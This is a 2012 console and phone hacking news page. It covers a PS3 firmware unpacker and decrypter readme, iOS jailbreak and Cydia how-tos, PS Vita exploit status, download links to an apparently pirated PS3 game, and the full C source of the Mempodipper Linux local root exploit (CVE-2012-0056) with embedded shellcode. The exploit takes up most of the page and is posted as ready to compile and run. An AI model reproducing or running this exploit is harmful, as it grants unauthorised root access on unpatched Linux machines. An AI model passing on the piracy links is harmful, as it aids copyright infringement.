Changes
——-v1.0 – Initial release
v1.1 – Added more tasks
v1.2 – Keys bug fixed
v1.3 – Fixed bug on folders
v2.1 – Added options menu in help screen
- “pup_PD.exe” modified, now can unpack “spkg_hdr.tar” and “ps3swu2.self” files on 3.56+ PUP
- Added function to decrypt “index.dat”
- Added function to unpack RCO files
- Added function to unpack and convert VAG to WAV filesv2.2 – Aded function to decrypt and unpack Core_OS
What we can do automatically with this program?
———————————————–- Unpack PUP
- Decrypt TAR/PKG/SELF
- Decrypt index.dat
- Decrypt Core_OS
- Unpack Core_OS
- Unpack decrypted TAR/PKG
- Unpack RCO files
- Unpack and decrypt VAG to WAV files__________________________________________________________________________________________________
$./pup_unpacker.exe
PUP Unpacker & Decrypter v2.2
By EvilnatUsage: pup_unpacker.exe [OPTION] filename.pup directory
Example: pup_unpacker.exe -all PS3UPDAT.PUP OFW355Options (ONLY CHOOSE ONE):
-h, –help displays this help
-x, –un-pup unpack PUP files only
-e, –un-tar unpack update_files.tar of PUP only
-c, –deun-core decrypt and unpack Core_OS of PUP file only
-t, –deun-tar decrypt and unpack TAR files of PUP only
-p, –deun-pkg decrypt and unpack all PKG files of PUP only
-s, –de-self decrypt all SELF files of PUP only
-i, –de-index unpack and decrypt index.dat of PUP only
-v, –conv-vag unpack and convert VAG to WAV files of PUP only
-r, –deun-rco decrypts and unpack RCO files of PUP only
-all, –deun-all unpack and decrypt entire PUP files__________________________________________________________________________________________________
- Usage:
1) Unpack folder of RAR on your home directory in Cygwin (C:cygwinhomeXXXXUnpacker)
2) Copy PS3UPDAT.PUP file you want in it
3) Open Cygwin’s console and enter the folder
4) And type: (OFW_355 is an example, you can change this)./pup_unpacker.exe [OPTION] PS3UPDAT.PUP OFW_355
[ Example: ./pup_unpacker.exe -all PS3UPDAT.PUP OFW_355 ]
5) Now depending what option you had choosen the executable will do it all automatically
All is done, “dev_decrypted_unpacked” folders contain self decrypted files
This program requires certain exe files and PS3 keys that are included in RAR, DONґT DELETE THEM
If an error occurs it will stop automatically, showing what has happened
Hope this helps someone——————————————————————–
——————————————————————–Thanks to: KaKaRoTo, Waninkoko, Geohot, Team Overflow, and more DEVS
——————————————————————–
——————————————————————–Evilnat (PS3SOS/PSVITASOS)
Jan 24 2012
PS3 PUP Unpacker & Decrypter 2.2 Released – Download
Jan 24 2012
Absinthe Jailbreak 0.3 Released – Download
Jan 24 2012
Trash.Box.PSN.PS3-DUPLEX Released – Download
Size: 1362 MB
http://depositfiles.com/files/mpbiz3anw/Trash.Box.PSN.PS3-DUPLEX.part1.rar
http://depositfiles.com/files/cnmurziw5/Trash.Box.PSN.PS3-DUPLEX.part2.rar
Jan 24 2012
PS3 TrueBlue 2.5 Released – Download
TrueBlue 2.5 Updater is ready for release, and as usual it adds more ‘Game Compatibility Fixes‘ so that more patched EBOOTs can be released for the remaining v3.6+ Sony PS3 Games, along with room for future support of the up-coming v4.01 firmware which is now being tested by Sony on the DEBUG machines.
Change log:
- Requires True Blue CFW v2
- Game compatibility fixes
NOTE: You need to update to the v2 of CFW that was released back on Jan. 17th, 2012 for this v2.5 Updater to install!
Direct Link to the New v2.5 Updater: –> TrueBlueUpdate-2.5.zip (425.6kb)
Jan 24 2012
Jailbreak Statistics
Here’s a quick breakdown of how many A5 owners have jailbroken their devices since Friday morning. The numbers as of Monday afternoon are:
- 491,325 new iPhone4,1 devices
- 308,967 new iPad2 devices
- 152,940 previously jailbroken (at 4.x) iPad2 devices
Total: 953,232 new A5 jailbreaks in a little over 3 days
Jan 24 2012
Hack – Linux Local Root Via SUID /prod/pid/mem Write
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
int send_fd(int sock, int fd)
{
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
int n;
char cms[CMSG_SPACE(sizeof(int))];
buf[0] = 0;
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = CMSG_LEN(sizeof(int));
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
return -1;
close(sock);
return 0;
}
int recv_fd(int sock)
{
int n;
int fd;
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
char cms[CMSG_SPACE(sizeof(int))];
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_name = 0;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = sizeof cms;
if ((n = recvmsg(sock, &msg, 0)) < 0)
return -1;
if (n == 0)
return -1;
cmsg = CMSG_FIRSTHDR(&msg);
memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
close(sock);
return fd;
}
int main(int argc, char **argv)
{
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
char parent_mem[256];
sprintf(parent_mem, "/proc/%d/mem", getppid());
printf("[+] Opening parent mem %s in child.\n", parent_mem);
int fd = open(parent_mem, O_RDWR);
if (fd < 0) {
perror("[-] open");
return 1;
}
printf("[+] Sending fd %d to parent.\n", fd);
send_fd(atoi(argv[2]), fd);
return 0;
}
printf("===============================\n");
printf("= Mempodipper =\n");
printf("= by zx2c4 =\n");
printf("= Jan 21, 2012 =\n");
printf("===============================\n\n");
int sockets[2];
printf("[+] Opening socketpair.\n");
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
perror("[-] socketpair");
return -1;
}
if (fork()) {
printf("[+] Waiting for transferred fd in parent.\n");
int fd = recv_fd(sockets[1]);
printf("[+] Received fd at %d.\n", fd);
if (fd < 0) {
perror("[-] recv_fd");
return -1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
dup2(2, 6);
dup2(fd, 2);
unsigned long address;
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
address = strtoul(argv[2], NULL, 16);
else {
printf("[+] Reading su for exit@plt.\n");
// Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
char result[32];
result[0] = 0;
fgets(result, 32, command);
pclose(command);
address = strtoul(result, NULL, 16);
if (address == ULONG_MAX || !address) {
printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
return 1;
}
printf("[+] Resolved exit@plt to 0x%lx.\n", address);
}
printf("[+] Calculating su padding.\n");
FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
char result[256];
result[0] = 0;
fgets(result, 256, command);
pclose(command);
unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
unsigned long offset = address - su_padding;
printf("[+] Seeking to offset 0x%lx.\n", offset);
lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
// See shellcode-32.s in this package for the source.
char shellcode[] =
"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
char sock[32];
sprintf(sock, "%d", sockets[0]);
printf("[+] Executing child from child fork.\n");
execl("/proc/self/exe", argv[0], "-c", sock, NULL);
}
}Jan 24 2012
How To – Jailbreak iPhone 4S/ iPad 2 on iOS 5.0.1 Using Absinthe For Windows
STEP 1: Download Absinthe Jailbreak v.0.2
STEP 2: After done downloading open Absinthe jailbreak in Administrator mode then plugin your iPhone 4S/ iPad 2:
STEP 3: Now allow the app to recognize your device and you will find ‘Jailbreak” button appeared.
STEP 4: After the program is done running (and not a second before), go to your device’s home screen and locate the Absinthe icon. Click it. This executes the final stage of the jailbreak.
STEP 5: Now after the jailbreak is done, your device will restart and then you should see Cydia installed on your device 
Update: Fix “Error Establishing a Database Connection” While Jailbreaking with Absinthe
Simply go to Settings > General > Network > VPN > ON. And sure you will not see this error message again.
Update: Fix Camera Roll Error After Jailbreaking iPhone 4S And iPad 2
You can do so, simply by rerunning the jailbreak on the your iDevice.
Jan 22 2012
How To – Install Cydia 1.1.4 Without Jailbreak
It must be optimized for the model iDevice A5 and therefore no change to v1.1.3 on a model A4.
Since Cydia 1.1.3 you may have noticed that the Cydia application is very stable and does not crash as before.
Unofficial version for the A4 model iDevice jailbreak Redsn0w/Ac1dsn0w, extracted from a jailbreak iPad 2 and compile by crowie85.
Update to Cydia 1.1.4 Without Re-Jailbreak :
If you installed iFile
Goto Safari and Type http://www.SpiritJB.org/cydia114/
and open the file using iFile and press installer and it will update
see How to install .Deb file Example from here
(Not to Auto Install, installation MyFile iFile or recommended).
Jan 22 2012
How To – Install .DEB Files on iPhone / iPod / iPad
How to Install (Method 1) :
- SSH into iPhone – using iPhoneTunnel if your on Windows , Cyberduck if your on MacOS.
- Copy .deb file into tmp folder
- Quit Cydia if its running
- Hit Ctrl+T in WinSCP and run the following command : dpkg -i /tmp/name.deb ( just to make sure : you replace name.deb with the actual name of the deb file )
- After installation, you can delete the .deb file
How to Install (Method 2) :
- SSH your iPhone and go to /var/root/Media/Cydia/AutoInstall Copy the .deb file there and that just reboot your device. If Autoinstall folder is not lying in /var/root/Media/Cydia then you can create urself
How to Uninstall :
To uninstall the .deb file simply uninstall the app you installed via .deb file. You can use Cydia, Icy or Cydelete to uninstall from sprinboard too
Jan 22 2012
PS Vita – SKFU FW 1.52 Status Confirmed
Developer SKFU has taken the leap and updated his PS Vita to the latest firmware 1.52. Many are anticipating a firmware update that will block the recent exploits/findings achieved by Teck4, Wololo & SKFU. SKFU has confirmed that it is safe to update your PS Vita to 1.52 since all exploits are still functioning.
To Quote:
- Tech4′s exploit still works
- Wololo’s HBL still works
- everything I research atm didn’t change from 1.50 to 1.52
- If that is fine for you, there’s no reason not to update.
« Previous Page — Next Page »